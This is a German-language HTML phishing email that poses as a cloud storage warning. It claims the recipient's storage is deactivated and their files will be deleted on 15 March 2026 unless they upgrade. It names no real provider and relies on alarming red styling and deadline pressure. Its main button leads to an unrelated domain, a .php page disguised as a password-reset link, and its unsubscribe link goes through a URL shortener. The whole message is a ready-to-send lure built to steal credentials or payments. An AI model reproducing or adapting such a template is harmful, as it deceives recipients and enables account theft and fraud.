<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Cloud deaktiviert</title>
</head>
<body style="margin:0; padding:20px; background-color:#fef2f2; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">

<!-- CENTERING TABLE - BUSINESS EMAIL COMPATIBLE -->
<table width="100%" cellpadding="0" cellspacing="0" border="0" align="center" style="border-collapse:collapse;">
    <tr>
        <td align="center" style="padding:0;">
            
            <!-- MAIN CONTAINER - EXACT 550px MAX-WIDTH -->
            <table width="550" cellpadding="0" cellspacing="0" border="0" style="max-width:550px; width:100%; background:#ffffff; border-radius:12px; overflow:hidden; box-shadow:0 4px 15px rgba(220,38,38,0.15); border:1px solid #fecaca; border-collapse:collapse;" align="center">
                
                <!-- STATUS BAR - DARK RED -->
                <tr>
                    <td style="background:#7f1d1d; color:#fecaca; padding:8px; font-size:12px; font-weight:bold; text-align:center; text-transform:uppercase; letter-spacing:1px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                        Letzte Warnung • <span style="color:#fecaca;">Löschung am 15. März 2026</span>
                    </td>
                </tr>
                
                <!-- HERO SECTION - BRIGHT RED -->
                <tr>
                    <td style="background:#b91c1c; color:#ffffff; padding:30px 20px; text-align:center;">
                        <h1 style="margin:0; font-size:24px; font-weight:800; letter-spacing:-0.5px; color:#ffffff; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                            Ihr Cloud-Speicher wurde deaktiviert
                        </h1>
                        <p style="margin-top:8px; opacity:0.9; color:#ffffff; font-size:14px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                            Alle Uploads und Synchronisierungen sind gestoppt
                        </p>
                    </td>
                </tr>
                
                <!-- BODY CONTENT -->
                <tr>
                    <td style="padding:30px; background:#ffffff;">
                        
                        <!-- MAIN PARAGRAPH -->
                        <p style="margin:0 0 20px 0; font-size:16px; color:#2d3748; line-height:1.5; text-align:center; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                            Ihr Speicherlimit wurde überschritten. Aus diesem Grund haben wir vorübergehend alle Cloud-Funktionen für Ihr Konto pausiert. Wenn Sie nicht sofort handeln, werden Ihre Daten unwiderruflich gelöscht.
                        </p>
                        
                        <!-- WARNING LIST - RED BACKGROUND BOX -->
                        <table width="100%" cellpadding="0" cellspacing="0" border="0" style="background:#fff5f5; border-radius:8px; padding:20px; margin-bottom:25px; border:1px solid #fed7d7; border-collapse:collapse;">
                            <tr>
                                <td style="padding:20px;">
                                    
                                    <!-- LIST ITEM 1 -->
                                    <table width="100%" cellpadding="0" cellspacing="0" border="0" style="margin-bottom:12px; border-collapse:collapse;">
                                        <tr>
                                            <td width="30" style="color:#e53e3e; font-weight:bold; font-size:18px; vertical-align:middle;">×</td>
                                            <td style="color:#9b2c2c; font-weight:600; font-size:14px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif; vertical-align:middle;">Automatische Backups wurden gestoppt</td>
                                        </tr>
                                    </table>
                                    
                                    <!-- LIST ITEM 2 -->
                                    <table width="100%" cellpadding="0" cellspacing="0" border="0" style="margin-bottom:12px; border-collapse:collapse;">
                                        <tr>
                                            <td width="30" style="color:#e53e3e; font-weight:bold; font-size:18px; vertical-align:middle;">×</td>
                                            <td style="color:#9b2c2c; font-weight:600; font-size:14px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif; vertical-align:middle;">Neue Fotos und Videos werden nicht hochgeladen</td>
                                        </tr>
                                    </table>
                                    
                                    <!-- LIST ITEM 3 -->
                                    <table width="100%" cellpadding="0" cellspacing="0" border="0" style="margin-bottom:12px; border-collapse:collapse;">
                                        <tr>
                                            <td width="30" style="color:#e53e3e; font-weight:bold; font-size:18px; vertical-align:middle;">×</td>
                                            <td style="color:#9b2c2c; font-weight:600; font-size:14px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif; vertical-align:middle;">Dateisynchronisation zwischen Geräten deaktiviert</td>
                                        </tr>
                                    </table>
                                    
                                    <!-- LIST ITEM 4 -->
                                    <table width="100%" cellpadding="0" cellspacing="0" border="0" style="margin-bottom:0px; border-collapse:collapse;">
                                        <tr>
                                            <td width="30" style="color:#e53e3e; font-weight:bold; font-size:18px; vertical-align:middle;">×</td>
                                            <td style="color:#9b2c2c; font-weight:600; font-size:14px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif; vertical-align:middle;">E-Mail-Anhänge können nicht gespeichert werden</td>
                                        </tr>
                                    </table>
                                    
                                </td>
                            </tr>
                        </table>
                        
                        <!-- DEADLINE WARNING -->
                        <table width="100%" cellpadding="0" cellspacing="0" border="0" style="background:#ffedd5; border-radius:8px; padding:15px; margin-bottom:25px; border:1px solid #fed7aa; border-collapse:collapse;">
                            <tr>
                                <td align="center" style="padding:10px;">
                                    <span style="font-weight:800; color:#9a3412; font-size:18px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">⏰ Löschung am 15. März 2026</span>
                                    <p style="color:#7b341e; font-size:14px; margin:8px 0 0 0; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                                        Wenn Sie bis zu diesem Datum nicht upgraden, werden alle Ihre gespeicherten Dateien endgültig gelöscht.
                                    </p>
                                </td>
                            </tr>
                        </table>
                        
                        <!-- BUTTON -->
                        <table width="100%" cellpadding="0" cellspacing="0" border="0" style="border-collapse:collapse;">
                            <tr>
                                <td align="center" style="padding:0;">
                                    <table cellpadding="0" cellspacing="0" border="0" width="100%" style="border-collapse:collapse;">
                                        <tr>
                                            <td align="center" bgcolor="#e53e3e" style="border-radius:6px; box-shadow:0 2px 5px rgba(229,62,62,0.4);">
                                                <a href="https://bendarysport.com/hjshfzuo.php?mode=resetPassword&oobCode=_nFVMB_rxFzZcoeDDNaYrO7618lON1cq5k3adAnnwRIAAAGc7hlQYQ&apiKey=AIzaSyCjMtPnKxqsNQGTLrOoO1n79HBMkmisSbQ&lang=en&tenantId=vbvb114-sj04s" style="display:block; width:100%; background:#e53e3e; color:#ffffff; font-weight:bold; text-align:center; padding:16px 0; border-radius:6px; text-decoration:none; font-size:18px; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                                                    Jetzt upgraden – Daten retten
                                                </a>
                                            </td>
                                        </tr>
                                    </table>
                                </td>
                            </tr>
                        </table>
                        
                        <!-- FOOTNOTE TEXT -->
                        <p style="text-align:center; font-size:13px; color:#718096; margin:20px 0 0 0; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                            Sie können jederzeit upgraden oder Speicherplatz freigeben. Nach dem 15. März 2026 ist eine Wiederherstellung nicht mehr möglich.
                        </p>
                        
                    </td>
                </tr>
                
                <!-- FOOTER WITH UNSUBSCRIBE -->
                <tr>
                    <td style="text-align:center; font-size:11px; color:#a0aec0; padding:20px; background:#ffffff; font-family:-apple-system, BlinkMacSystemFont, Arial, sans-serif;">
                        <a href="https://ap.lc/SZjKQ" style="color:#a0aec0; text-decoration:none;">Von Benachrichtigungen abmelden</a>
                    </td>
                </tr>
                
            </table>
            
        </td>
    </tr>
</table>

</body>
</html>